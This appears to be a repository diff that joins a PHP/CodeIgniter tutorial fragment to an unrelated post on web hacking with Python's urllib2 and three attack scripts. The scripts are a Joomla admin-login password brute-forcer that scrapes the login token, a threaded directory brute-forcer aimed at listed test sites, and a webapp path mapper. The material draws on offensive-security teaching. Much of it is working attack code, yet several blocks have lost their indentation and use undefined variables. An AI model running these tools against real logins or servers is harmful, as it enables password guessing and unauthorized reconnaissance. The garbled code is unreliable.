Variables:
```
<?php
$result = 4*8;
?>
```
Comments are written with ```//``` or ```/* */```.
Print function:
```
<?php
echo "that's a print";
?>
```
Functions:
```
<?php
function print_this($name){
    echo 'Print this ' . $name . '.';
    return 'nice printing';
}
$extra_print = print_this('aaaaa');
print($extra_print);
?>
```
When a PHP file is accessed, all of its functions are initialized before any of the other lines of code are executed. As long as a function is defined in the same file, it can be called from anywhere within that file.
The scope of a variable refers to the domain within which it can be referenced. In PHP, any variables initialized and contained within a function itself are only available within that function.
### Arrays
Creating an empty array:
```
<?php $new_array = array(); ?>
```
Adding elements:
```
<?php $new_array[] = 1; $new_array[] = 5; ?>
```
Creating an array with values already:
```
<?php $other_array = array(1,2,3); ?>
```
In PHP, arrays are like dictionaries. If you add items like above, the keys will increment from 0. You can also specify the key:
```
<?php $dictionary['dog'] = 1; echo $dictionary['dog']; ?>
```
Multi-arrays:
```
$cars = array
(
array("Volvo",22,18),
array("BMW",15,13),
array("Saab",5,2),
array("Land Rover",17,15)
);
```
Loop foreach:
```
<?php
foreach ($array_number as $variable_representing_current_item){
}
?>
```
Loop for:
```
<?php
$other_array = array();
for ($i = 0; $i < 4; $i++){
    $other_array[] = $i;
}
?>
```
## The Model-View-Controller Pattern (MVC)
At a high level, the flow of a web app is:
* The user requests a certain page by typing a URL in the browser.
* The app determines what needs to be displayed.
* The data required for the page is requested and retrieved from the database.
* The resulting data is used to render the page's display to the user.
* The MVC structure is based on the presence of three main components: models, views, and controllers.
### Models: Representing the Data Object
Responsible for communicating with the database. Composed of two parts:
* fields: Responsible for representing the various pieces of data within an object (the information within the database).
* methods: Provide extra functionality within our models. Allow the manipulation of the model's initial information or perform additional actions related to the data.
### Controllers: Workhorses
Determine what objects to retrieve and how to organize them.
Handle user requests, retrieve the proper information, and pass it to the proper view.
Different requests are handled by different controller actions.
### Views: What the User Sees
Responsible for the presentation layer, the actual visual display.
Each individual page within a web app has its own view.
Views contain HTML code and PHP (if this is the backend language) to inject objects' information, passed to the view via a controller.
A simplified version of Facebook profile view:
```
<section id="personal_info"> <?php // some code ?> </section> <section id="photos"> <?php // some code ?> </section>
```
## Frameworks
The basis/foundation of your web app.
For PHP, we can download CodeIgniter, rename it to our project name, copy it to the /var/www folder, and open it at ```http://localhost/<folder>```. We can now modify the files for our app.
If you get the 403 forbidden error, check the permissions and then type:
```
restorecon -r /var/www/html
```
(restorecon resets the SELinux security context (type), stored in extended attributes, of one or more files).
The user guide can be seen at
```http://localhost/APP_NAME/user_guide/```
### CodeIgniter Basics
The system folder contains all of CodeIgniter's inner workings.
The application folder is where all the code specific to our app will live, including models, views, and controllers.
Controllers (```application/controllers/welcome.php```)
The Welcome class inherits from the CI_Controller class.
An index refers to the main/default location.
The index action is responsible for loading the view that renders the welcome message:
```
public function index() { $this->load->view('welcome_message'); }
```
In the case of controllers, each action is frequently associated with a URL.
The ```'welcome_message'``` view is at ```application/views/welcome_message.php```.
### Routes
The way that our web app knows where to direct our users, based on the URLs they enter, is by establishing routes. Routes are a mapping between URLs and specific controller actions.
We can configure routes at ```application/config/routes.php```:
```
$route['desired-url-fragment'] = "controller-name/action-name";
```
Some routes work automatically: you can reference any controller action using the following URL format:
```http://localhost/APP_NAME/index.php/[controller-name]/[action-name]```
For example:
```http://localhost/APP_NAME/index.php/welcome/index/```
### Configuring our app to use the Database
CI has built-in support for interacting with a database.
In our application, the database configuration file is stored at ```application/config/database.php```.
To connect our app to the MySQL database, update this file to:
```
$db['default']['hostname'] = 'localhost';
$db['default']['username'] = 'root';
$db['default']['password'] = '<your-root-password>';
$db['default']['database'] = '<database-name-from-before>';
```
To have access to the database functionality throughout the entire web app, auto-load the database library by changing the file ```application/config/autoload.php``` with:
```
$autoload['libraries'] = array('database');
```
Check that the page still works fine (```$autoload['libraries'] = array('template', 'database');``` does not work yet).
### Models
Each model starts the same, as they intend to serve the same general function.
We create a new file in the application/models folder named todomodel.php with the code:
```
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');

class Todomodel extends CI_Model {

    function __construct() {
        parent::__construct();
    }
The second responsibility of models is to interact with our database. We need to implement a way for our todomodel to retrieve all of the todos in our database. We add a get_all_entries function below the constructor:
```
function get_all_entries() {
    //$query = $this->db->get('todos');
    $query = $this->db->order_by('order','ASC')->get('todos');
    $results = array();
    foreach ($query->result() as $result) {
        $results[] = $result;
    }
    return $results;
}
```
In this snippet, we query our database ordered by the ```order``` column, in ascending order.
---
Enjoy! This article was originally posted [here](https://coderwall.com/p/5ltrxq/lamp-and-codeigniter).

View file

@ -0,0 +1,541 @@
# Hacking the Web with Python's urllib2 (by bt3)
Python's [urllib2](https://docs.python.org/2/library/urllib2.html) library is **the tool** for interacting with web services, with several functions and classes to help with handling URLs. **urllib2** is written on top of the [httplib](https://docs.python.org/2/library/httplib.html) library (which defines classes implementing the client side of HTTP and HTTPS). In turn, **httplib** uses the [socket](https://singularity-sh.vercel.app/black-hat-python-networking-the-socket-module.html) library.
In this post I [introduce urllib2](#intro) and then I work on two problems: [mapping webapps from their installation files](#map) and [brute-forcing the contents of webapps to find hidden resources](#brute1).
-----
## <a name="intro"></a>urllib2 101
The easiest way to start is by taking a look at the **urlopen** method, which returns an object similar to a **file** in Python (plus three more methods: **geturl**, for the URL of the resource; **info**, for meta-information; and **getcode**, for HTTP status code).
### A Simple GET
Let's see how a simple [GET](http://www.w3schools.com/tags/ref_httpmethods.asp) request works. This is done directly with [urlopen](https://docs.python.org/2/library/urllib2.html#urllib2.urlopen):
```python
>>> import urllib2
>>> msg = urllib2.urlopen('http://www.google.com')
>>> print msg.read(100)
<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including (...)
```
Notice that, unlike modules such as [scapy](https://singularity-sh.vercel.app/black-hat-python-infinite-possibilities-with-the-scapy-module.html) or [socket](https://singularity-sh.vercel.app/black-hat-python-the-socket-module.html), we *need to specify the protocol* in the URL (HTTP).
Now, let's be fancy and customize the output:
```python
import urllib2
response = urllib2.urlopen('http://www.google.com')
print 'RESPONSE:', response
print 'URL :', response.geturl()
headers = response.info()
print 'DATE :', headers['date']
print 'HEADERS :'
print headers
data = response.read()
print 'LENGTH :', len(data)
print 'DATA :'
print data
```
Which leads to something like this:
```sh
RESPONSE: <addinfourl at 140210027950304 whose fp = <socket._fileobject object at 0x7f8530eec350>>
URL : http://www.google.com
DATE : Tue, 23 Dec 2014 15:04:32 GMT
HEADERS :
Date: Tue, 23 Dec 2014 15:04:32 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: PREF=ID=365306c56a0ffee1:FF=0:TM=1419951872:LM=1419951872:S=lyvP_3cexMCllrVl; expires=Thu, 22-Dec-2016 15:04:32 GMT; path=/; domain=.google.com
Set-Cookie: NID=67=fkMfihQT2bLXyqQ8PIge1TwighxcsI4XVUWQl-7KoqW5i3T-jrzUqrC_lrtO7zd0vph3AzSMxwz2LkdWFN479RREL94s0hqRq3kOroGsUO_tFzBhN1oR9bDRMnW3hqOx; expires=Wed, 01-Jul-2015 15:04:32 GMT; path=/; domain=.google.com; HttpOnly
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=0.02
Connection: close
LENGTH : 17393
DATA :
<!doctype html>(...)
```
### A simple POST
[POST](http://www.w3schools.com/tags/ref_httpmethods.asp) requests send data to a URL ([often referring](https://docs.python.org/2/howto/urllib2.html#data) to [CGI](http://en.wikipedia.org/wiki/Common_Gateway_Interface) scripts or forms in web applications).
POST requests, differently from GET requests, usually have side effects such as changing the state of the system. But data can also be passed in an HTTP GET request by encoding it in the URL.
In the case of an HTML form, the data needs to be encoded, and this encoding is done with [urllib](https://docs.python.org/2/library/urllib.html)'s **urlencode** method (also used for generating GET query strings):
```python
import urllib
import urllib2
data = { 'q':'query string', 'foo':'bar' }
encoded_data = urllib.urlencode(data)
url = 'http://localhost:8080/?' + encoded_data
response = urllib2.urlopen(url)
print response.read()
```
In reality, when working with **urllib2**, a more flexible way to use **urlopen** is to pass it a **Request object** that carries the encoded data, instead of a plain URL string:
```python
data = { 'q':'query string', 'foo':'bar' }
encoded_data = urllib.urlencode(data)
req = urllib2.Request(url, encoded_data)
response = urllib2.urlopen(req)
print response.read()
```
That's one of the differences between **urllib2** and **urllib**: the former can accept a **Request object** to set the headers for a URL request, while the latter accepts only a URL.
### Headers
As we have learned above, we can create a GET request using not only strings but also the [Request](https://docs.python.org/2/library/urllib2.html#urllib2.Request) class. This allows us, for example, to define custom headers.
To craft our own header we create a headers dictionary, with the header key and the custom value. Then we pass a Request object built with these headers to the **urlopen** function call.
For example, let's see how this works for the **User-Agent** header (which is the way the browser identifies itself):
```python
>>> headers = {}
>>> headers['User-Agent'] = 'Googlebot'
>>> request = urllib2.Request(url, headers=headers)
>>> response = urllib2.urlopen(request)
>>> print "The Headers are: ", response.info()
The Headers are: Date: Tue, 23 Dec 2014 15:27:01 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=8929a796c6fba710:FF=0:TM=1419953221:LM=1419953221:S=oEh5NKUEIEBinpwX; expires=Thu, 22-Dec-2016 15:27:01 GMT; path=/; domain=.google.com
Set-Cookie: NID=67=QhRTCRsa254cvvos3EXz8PkKnjQ6qKblw4qegtPfe1WNagQ2p0GlD1io9viogAGbFm7RVDRAieauowuaNEJS3aySZMnogy9oSvwkODi3uV3NeiHwZG_neZlu2SkO9MWX; expires=Wed, 01-Jul-2015 15:27:01 GMT; path=/; domain=.google.com; HttpOnly
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=0.02
Connection: close
>>> print "The Date is: ", response.info()['date']
The Date is: Tue, 23 Dec 2014 15:27:01 GMT
>>> print "The Server is: ", response.info()['server']
The Server is: gws
>>> response.close()
```
We could also add headers with the **add_header** method:
```
>>> request = urllib2.Request('http://www.google.com/')
>>> request.add_header('Referer', 'http://www.python.org/')
>>> request.add_header('User-agent', 'Mozilla/5.0')
>>> response = urllib2.urlopen(request)
```
### HTTP Authentication
When authentication is required, the server sends a header (and the **401 error code**) requesting this procedure. The response also specifies the **authentication scheme** and a **realm**. Something like this:
```
WWW-Authenticate: SCHEME realm="REALM".
```
The client then retries the request with the name and password for the realm, included as a header in the request. The steps for this process are the following:
1) create a password manager,
```
passwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
```
2) add the username and password,
```
top_url = "http://example.com/"
passwd_mgr.add_password(None, top_url, username, password)
```
3) create an auth handler,
```
handler = urllib2.HTTPBasicAuthHandler(passwd_mgr)
```
4) create an *opener* (an OpenerDirector instance),
```
opener = urllib2.build_opener(handler)
```
5) use the opener to fetch a URL,
```
opener.open(a_url)
```
6) install the opener,
```
urllib2.install_opener(opener)
```
7) finally, open the page (where authentication is now handled automatically):
```
pagehandle = urllib2.urlopen(top_url)
```
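Putting the seven steps together, a minimal sketch looks like this (the URL and credentials are placeholders):

```python
import urllib2

top_url = 'http://example.com/protected/'
username, password = 'user', 's3cret'

# steps 1 and 2: password manager holding the credentials for the realm
passwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
passwd_mgr.add_password(None, top_url, username, password)

# steps 3, 4, and 6: auth handler, opener, and global installation
handler = urllib2.HTTPBasicAuthHandler(passwd_mgr)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)

# steps 5-7: with the opener installed, authentication is handled automatically
pagehandle = urllib2.urlopen(top_url)
print pagehandle.read()
```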
### Error Handling
**urllib2** has also methods for handling URL errors:
```python
>>> request = urllib2.Request('http://www.false_server.com')
>>> try:
...     urllib2.urlopen(request)
... except urllib2.URLError, e:
...     print e.reason
...
(4, 'getaddrinfo failed')
```
Every HTTP response from the server contains a numeric [status code](http://en.wikipedia.org/wiki/List_of_HTTP_status_codes). The default handlers take care of some of these responses and, for the others, **urlopen** raises an **HTTPError** (which is a subclass of **URLError**).
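For instance, a small sketch distinguishing the two exception types (the URL is an arbitrary example; since **HTTPError** is a subclass of **URLError**, it must be caught first):

```python
import urllib2

try:
    urllib2.urlopen('http://www.example.com/this-page-does-not-exist')
except urllib2.HTTPError, e:
    # the server answered, but with an error status code
    print 'HTTP status:', e.code
except urllib2.URLError, e:
    # we never reached a server at all (DNS failure, refused connection, ...)
    print 'Failed to reach the server:', e.reason
```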
### Other Available Methods
Other available methods in the **urllib2** library:
* **install_opener** and **build_opener**: install and return an OpenerDirector instance.
* **URLError** and **HTTPError**: exceptions raised for connection problems and for [HTTP error responses](https://docs.python.org/2/howto/urllib2.html#error-codes), respectively.
* **HTTPCookieProcessor**: handles HTTP cookies.
* **HTTPProxyHandler**: sends requests to a proxy.
* **AbstractBasicAuthHandler**, **HTTPBasicAuthHandler**, **ProxyBasicAuthHandler**, **HTTPDigestAuthHandler**, **AbstractDigestAuthHandler**, **ProxyDigestAuthHandler**: handle authentications.
* **HTTPPasswordMgr** and **HTTPPasswordMgrWithDefaultRealm**: keep a database of realm, URL, user and passwords mappings.
* **HTTPHandler**, **HTTPSHandler**, **FileHandler**, **FTPHandler**, **UnknownHandler**: handle sources.
Available methods for the **Request** objects:
* **add_data**, **has_data**, and **get_data**: deal with the Request data.
* **add_header**, **add_unredirected_header**, **has_header**, **get_header**, **header_items**: deal with the header data.
* **get_full_url**, **get_type**, **get_host**, **get_selector**, **set_proxy**, **get_origin_req_host**: deal with the URL data.
And let's not forget about **urllib**'s [urlparse](http://pymotw.com/2/urlparse/index.html#module-urlparse), which provides functions to analyze URL strings. **urlparse** breaks URL strings up in several optional components: **scheme** (example: http), **location** (example: www.python.org:80), **path** (example: index.html), **query** and **fragment**.
Other common functions are **urljoin** and **urlsplit**.
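For instance, a quick look at the pieces **urlparse** and **urljoin** give back:

```python
from urlparse import urlparse, urljoin

parts = urlparse('http://www.python.org:80/doc/index.html?q=urllib2#intro')
print parts.scheme     # http
print parts.netloc     # www.python.org:80
print parts.path       # /doc/index.html
print parts.query      # q=urllib2
print parts.fragment   # intro

print urljoin('http://www.python.org/doc/', 'tutorial/index.html')
# http://www.python.org/doc/tutorial/index.html
```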
---
## <a name="map"></a>Mapping Webapps from their Installation Packages
[Content management systems](http://en.wikipedia.org/wiki/Content_management_system) are platforms that make it easy to start blogs or simple websites. They are common in shared hosting environments. However, when not all of the security procedures are followed, they can be an easy target for attackers to gain access to the server.
In this section we are going to build a scanner that searches for all the files that are reachable on the remote target, following the structure of the downloaded webapp. This is based on one of the examples from [Black Hat Python](http://www.nostarch.com/blackhatpython).
This type of scanner can show installation files, directories that are not processed by [.htaccess](http://en.wikipedia.org/wiki/Htaccess), and other files that can be useful for an attack.
### Crafting the Scanner
In our scanner script, we use Python's [Queue](https://docs.python.org/2/library/queue.html) objects to build a queue of items, with multiple threads picking items off for processing. This makes the scanner run very quickly. The steps are the following:
1) We define the target URL (in this case we are borrowing the example from the book), the number of threads, the local directory where we downloaded and extracted the webapp, and a filter with the file extensions we are not interested in:
```python
import urllib2
import Queue
import os
import threading
THREADS = 10
TARGET = 'http://www.blackhatpython.com'
DIRECTORY = '/home/User/Desktop/wordpress'
FILTERS = ['.jpg', '.css', '.gif', '.png']
```
2) We define a function with a loop that keeps executing until the queue with the paths is empty. On each iteration we get one of these paths and add it to the target URL to see whether it exists (outputting the HTTP status code):
```python
def test_remote():
    while not web_paths.empty():
        path = web_paths.get()
        url = '%s%s' % (TARGET, path)
        request = urllib2.Request(url)
        try:
            response = urllib2.urlopen(request)
            content = response.read()
            print '[%d] => %s' % (response.code, path)
            response.close()
        except urllib2.HTTPError as error:
            print 'Failed: ' + str(error.code)
```
3) The main loop first creates the queue for the paths and then uses the **os.walk** method to map all the files and directories in the local version of the webapp, adding the names to the queue (after being filtered by our custom extension list):
```python
if __name__ == '__main__':
os.chdir(DIRECTORY)
web_paths = Queue.Queue()
for r, d, f in os.walk('.'):
for files in f:
remote_path = '%s/%s' %(r, files)
if remote_path[0] == '.':
remote_path = remote_path[1:]
if os.path.splitext(files)[1] not in FILTERS:
web_paths.put(remote_path)
```
4) Finally, we spawn the threads that will run our **test_remote** function. Each thread keeps running until the path queue is empty:
```python
for i in range(THREADS):
print 'Spawning thread number: ' + str(i+1)
t = threading.Thread(target=test_remote)
t.start()
```
### Testing the Scanner
Now we are ready to test our scanner. We download and test three webapps: [WordPress](https://en-ca.wordpress.org/download/), [Drupal](https://www.drupal.org/project/download), and [Joomla 3.1.1](http://www.joomla.org/announcements/release-news/5499-joomla-3-1-1-stable-released.html).
Running first for Joomla gives the following results:
```sh
$ python mapping_web_app_install.py
Spawning thread number: 1
Spawning thread number: 2
Spawning thread number: 3
Spawning thread number: 4
Spawning thread number: 5
Spawning thread number: 6
Spawning thread number: 7
Spawning thread number: 8
Spawning thread number: 9
Spawning thread number: 10
[200] => /web.config.txt
[200] => /modules/mod_whosonline/helper.php
[200] => /LICENSE.txt
[200] => /README.txt
[200] => /modules/mod_whosonline/mod_whosonline.xml
[200] => /joomla.xml
[200] => /robots.txt.dist
(...)
```
Running for WordPress:
```sh
(...)
[200] => /wp-links-opml.php
[200] => /index.php
[200] => /wp-config-sample.php
[200] => /wp-load.php
[200] => /license.txt
[200] => /wp-mail.php
[200] => /xmlrpc.php
[200] => /wp-trackback.php
[200] => /wp-cron.php
[200] => /wp-admin/custom-background.php
[200] => /wp-settings.php
[200] => /wp-activate.php
(...)
```
Finally, running for Drupal, we only get five files:
```sh
(...)
[200] => /download.install
[200] => /LICENSE.txt
[200] => /README.txt
[200] => /download.module
[200] => /download.info
```
In all of these runs we are able to find some interesting files, including XML and txt files. This recon can be the starting point of an attack. Really cool.
-----
## <a name="brute1"></a>Brute-Forcing the Contents of Webapps
In general we are not aware of the structure of the files that are accessible on a web server (we don't have the webapp available like in the previous example). Usually we can deploy a spider, like the one in the [Burp suite](http://portswigger.net/burp/), to crawl the target and find them. However, this might not find sensitive files such as development/configuration files and debugging scripts.
The best way to find sensitive files is to brute-force common filenames and directories. How do we do this?
It turns out that the task is really easy when we already have word lists of common directory and file names. These lists can be downloaded from sources such as the [DirBuster](https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project) project or [SVNDigger](https://www.netsparker.com/blog/web-security/svn-digger-better-lists-for-forced-browsing/).
Since scanning third-party websites without permission is not legal, we are going to use *playground* websites, which are intentionally made available for testing. Some examples (from [here](http://blog.taddong.com/2011/10/hacking-vulnerable-web-applications.html)):
* [testphp.vulnweb.com](http://testphp.vulnweb.com)
* [testasp.vulnweb.com](http://testasp.vulnweb.com)
* [testaspnet.vulnweb.com](http://testaspnet.vulnweb.com)
* [crackme.cenzic.com](http://crackme.cenzic.com)
* [google-gruyere.appspot.com/start](http://google-gruyere.appspot.com/start)
* [www.hacking-lab.com/events/registerform.html](https://www.hacking-lab.com/events/registerform.html?eventid=245)
* [hack.me](https://hack.me)
* [www.hackthissite.org](http://www.hackthissite.org)
* [zero.webappsecurity.com](http://zero.webappsecurity.com)
* [demo.testfire.net](http://demo.testfire.net)
* [www.webscantest.com](http://www.webscantest.com)
* [hackademic1.teilar.gr](http://hackademic1.teilar.gr)
* [pentesteracademylab.appspot.com](http://pentesteracademylab.appspot.com)
### Writing the Script
In our script we accept word lists for common names of files and directories and use them to attempt to discover reachable paths on the server.
In the same way as before, we can achieve a reasonable speed by creating a pool of threads to discover the contents.
The steps of our script are:
1) We define the target, the number of threads, the path for the wordlist (which I made available [here](https://github.com/go-outside-labs/My-Gray-Hacker-Resources/tree/master/Other_Hackings/useful_lists/files_and_dir_lists)), a rogue User-Agent, and the filter list of extensions that we want to look at:
```python
import urllib2
import threading
import Queue
import urllib
THREADS = 10
TARGET = 'http://testphp.vulnweb.com'
WORDLIST_FILE = '../files_and_dir_lists/SVNDigger/all.txt'
USER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64l rv:19.0) Gecko/20100101 Firefox/19.0'
EXTENSIONS = ['.php', '.bak', '.orig', '.inc']
```
2) We create a function that reads our word list, adds each of the words into a queue, and returns this queue:
```python
def build_wordlist(WORDLIST_FILE):
f = open(WORDLIST_FILE, 'rb')
raw_words = f.readlines()
f.close()
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
words.put(word)
return words
```
3) We create a function that loops until the queue is empty, checks whether each word looks like a directory or a file (using the extension list), and then brute-forces the target URL with each of these attempts:
```python
def dir_bruter(word_queue, TARGET, EXTENSIONS=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
if '.' not in attempt:
attempt_list.append('/%s/' %attempt)
else:
attempt_list.append('/%s' %attempt)
if EXTENSIONS:
for extension in EXTENSIONS:
attempt_list.append('/%s%s' %(attempt, extension))
for brute in attempt_list:
url = '%s%s' %(TARGET, urllib.quote(brute))
try:
headers = {}
headers['User-Agent'] = USER_AGENT
r = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(r)
if len(response.read()):
print '[%d] => %s' %(response.code, url)
except urllib2.URLError, e:
if hasattr(e, 'code') and e.code != 404:
print '[! %d] => %s' %(e.code, url)
pass
```
4) In the main loop, we build the word list and then spawn the threads for our **dir_bruter** function:
```python
if __name__ == '__main__':
    word_queue = build_wordlist(WORDLIST_FILE)
    for i in range(THREADS):
        print 'Thread ' + str(i)
        t = threading.Thread(target=dir_bruter, args=(word_queue, TARGET))
        t.start()
```
### Running the Script
Running this against one of the web application targets will print something like this:
```sh
$ python brute_forcing_locations.py
[200] => http://testphp.vulnweb.com/CVS
[200] => http://testphp.vulnweb.com/admin
[200] => http://testphp.vulnweb.com/script
[200] => http://testphp.vulnweb.com/images
[200] => http://testphp.vulnweb.com/pictures
[200] => http://testphp.vulnweb.com/cart.php
[200] => http://testphp.vulnweb.com/userinfo.php
[! 403] => http://testphp.vulnweb.com/cgi-bin/
(...)
```
Pretty neat!
-----
## Further References:
- [Form Contents](http://www.w3.org/TR/REC-html40/interact/forms.html#h-17.13.4)
- [A robots.txt parser](http://pymotw.com/2/robotparser/index.html#module-robotparser)
- [stackoverflow](http://stackoverflow.com/questions/tagged/urllib2)
- [Black Hat Python](http://www.nostarch.com/blackhatpython).

View file

@ -0,0 +1,147 @@
#!/usr/bin/env python
__author__ = "bt3"
"""
Now we are going to learn how to brute force a web server.

Most web systems have brute-force protection these days, such as
captchas, math equations, or a login token that has to be submitted
with the request.

In this script we will brute force Joomla, which lacks account lockouts
or strong captchas by default. To brute force it, we need to retrieve
the login token from the login page before submitting the password attempt,
and ensure that we accept cookies in the session.

1) Install Joomla: https://docs.joomla.org/J3.x:Installing_Joomla

2) Fire up ```target/administrator``` and find the PHP form elements.
We see that the form gets submitted to the ```/administrator/index.php```
path as an HTTP POST. You also see that there is a name attribute set to a
long, randomized string. This string is checked against the current user
session, stored in a cookie that is passed with the request:

1. Retrieve the login page and accept all cookies that are returned.
2. Parse out all of the form elements from the HTML.
3. Set the username/password to a guess from the dictionary
(https://code.google.com/p/grimwepa/downloads/detail?name=cain.txt)
4. Send an HTTP POST to the login processing script including all HTML form fields and our stored cookies.
5. Test to see if we have successfully logged into the web app.
"""
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
from brute_forcing_locations import build_wordlist
THREAD = 10
USERNAME = 'admin'
WORDLIST = '../files_and_dir_lists/passwords/cain.txt'
RESUME = None
# where the script downloads and parses the HTML
TARGET_URL = 'http://localhost:80/administrator/index.php'
# where to submit the brute-force attempt
TARGET_POST = 'http://localhost:80/administrator/index.php'
USERNAME_FIELD = 'username'
PASSWORD_FIELD = 'passwd'
# string to check for after each brute-force attempt to determine success
SUCESS_CHECK = 'Administration - Control Panel'
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print 'Finished setting up for: ' + username
def run_bruteforce(self):
for i in range(THREAD):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
# after we grab our password attempt, we set the cookie jar,
# and this class will store cookies in the 'cookies' file
jar = cookielib.FileCookieJar('cookies')
# initialize the urllib2 opener
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(TARGET_URL)
page = response.read()
print "Trying: %s : %s (%d left)" %(self.username, brute, \
self.password_q.qsize())
# parse out the hidden fields
# make the initial request to retrieve the login form
# when we have the raw html we pass it off our html parser
# and call its feed method, which returns a dictionary of all
# the retrieved form elements
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[USERNAME_FIELD] = self.username
post_tags[PASSWORD_FIELD] = brute
# URL encode the POST variables and pass it to the
# HTTP request
login_data = urllib.urlencode(post_tags)
login_response = opener.open(TARGET_POST, login_data)
login_result = login_response.read()
if SUCESS_CHECK in login_result:
self.found = True
print '[*] Bruteforce successful.'
print '[*] Username: ' + username
print '[*] Password: ' + brute
print '[*] Waiting for the other threads to exit...'
# core of our HTML processing: the HTML parsing class to use
# against the target.
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
# create a dictionary for the results
self.tag_results = {}
# called whenever a tag is found
def handle_starttag(self, tag, attrs):
# we are looking for input tags
if tag == 'input':
tag_name = None
tag_value = None
for name, value in attrs:
if name == 'name':
tag_name = value
if name == 'value':
tag_value = value
if tag_name is not None:
self.tag_results[tag_name] = value
if __name__ == '__main__':
words = build_wordlist(WORDLIST)
brute_obj = Bruter(USERNAME, words)
brute_obj.run_bruteforce()

View file

@ -0,0 +1,106 @@
#!/usr/bin/env python
__author__ = "bt3"
import urllib2
import threading
import Queue
import urllib
THREADS = 10
TARGETS = [ 'http://testphp.vulnweb.com', \
'http://testasp.vulnweb.com', \
'http://testaspnet.vulnweb.com',\
'http://testphp.vulnweb.com',\
'http://crackme.cenzic.com',\
'http://google-gruyere.appspot.com/start',\
'https://www.hacking-lab.com/events/registerform.html?eventid=245',\
'https://hack.me',\
'http://www.hackthissite.org',\
'http://zero.webappsecurity.com',\
'http://demo.testfire.net',\
'http://www.webscantest.com',\
'http://hackademic1.teilar.gr',\
'http://pentesteracademylab.appspot.com']
WORDLIST_FILE = '../files_and_dir_lists/SVNDigger/all.txt'
RESUME = None
USER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64l rv:19.0) Gecko/20100101 Firefox/19.0'
EXTENSIONS = ['.php', '.bak', '.orig', '.inc']
# read the wordlist and iterate over each line
def build_wordlist(WORDLIST_FILE):
f = open(WORDLIST_FILE, 'rb')
raw_words = f.readlines()
f.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
# functionality that allows us to resume a brute-forcing
# session if the network connectivity is interrupted or goes down
if RESUME is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print 'Resuming wordlist from: ' + resume
else:
words.put(word)
# when the entire file has been parsed, we return a Queue full of
# words to use on the brute-forcing function
return words
# accepts a Queue object that is populated with words to use
# for brute-forcing and an optional list of files extensions to test
def dir_bruter(word_queue, TARGET, EXTENSIONS=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
# check to see if there is a file extension in the current word;
# if not, treat it as a directory
if '.' not in attempt:
attempt_list.append('/%s/' %attempt)
else:
attempt_list.append('/%s' %attempt)
# if we want to bruteforce extensions, apply to the current word
if EXTENSIONS:
for extension in EXTENSIONS:
attempt_list.append('/%s%s' %(attempt, extension))
# iterate over our lists of attempts
for brute in attempt_list:
url = '%s%s' %(TARGET, urllib.quote(brute))
try:
headers = {}
# set to something innocuous
headers['User-Agent'] = USER_AGENT
r = urllib2.Request(url, headers = headers)
# test the remote web server
response = urllib2.urlopen(r)
if len(response.read()):
print '[%d] => %s' %(response.code, url)
except urllib2.URLError, e:
if hasattr(e, 'code') and e.code != 404:
print '[! %d] => %s' %(e.code, url)
pass
if __name__ == '__main__':
# get the list, and spin threads to brute force it
word_queue = build_wordlist(WORDLIST_FILE)
for target in TARGETS:
#print "Attacking " + target + '...'
for i in range(THREADS):
print 'Thread ' + str(i)
t = threading.Thread(target=dir_bruter, args=(word_queue, target))
t.start()

View file

@ -0,0 +1,68 @@
#!/usr/bin/env python
__author__ = "bt3"
import urllib2
import Queue
import os
import threading
THREADS = 10
TARGET = 'http://www.blackhatpython.com'
# local directory into which we have downloaded and extracted the web app
#DIRECTORY = '/home/User/Desktop/Joomla'
#DIRECTORY = '/home/User/Desktop/wordpress'
DIRECTORY = '/home/User/Desktop/drupal'
# list of file extensions we do not want to fingerprint
FILTERS = ['.jpg', '.gif', '.png', '.css']
# the loop keeps executing until the web_paths Queue is empty. On each
# iteration we grab a path from the queue, add it to the target website's
# base path, and then attempt to retrieve it
def test_remote():
while not web_paths.empty():
path = web_paths.get()
url = '%s%s' % (TARGET, path)
request = urllib2.Request(url)
try:
response = urllib2.urlopen(request)
content = response.read()
# if we successfully retrieve the file, the HTTP status code
# and the full path of the file are printed
print '[%d] => %s' % (response.code, path)
response.close()
# if the file is not found or protected by .htaccess, error
except urllib2.HTTPError as error:
fail_count += 1
print "Failed" + str(error.code)
if __name__ == '__main__':
os.chdir(DIRECTORY)
# queue object where we store files to locate in the remote server
web_paths = Queue.Queue()
# the os.walk function walks through all the files and directories in the
# local web application directory. This builds the full path to the target
# files and tests them against the filter list to make sure we are looking
# for the file types we want. For each valid file we find, we add it to our
# web_paths Queue.
for r, d, f in os.walk('.'):
for files in f:
remote_path = '%s/%s' %(r, files)
if remote_path[0] == '.':
remote_path = remote_path[1:]
if os.path.splitext(files)[1] not in FILTERS:
web_paths.put(remote_path)
# create a number of threads that will each call the test_remote function.
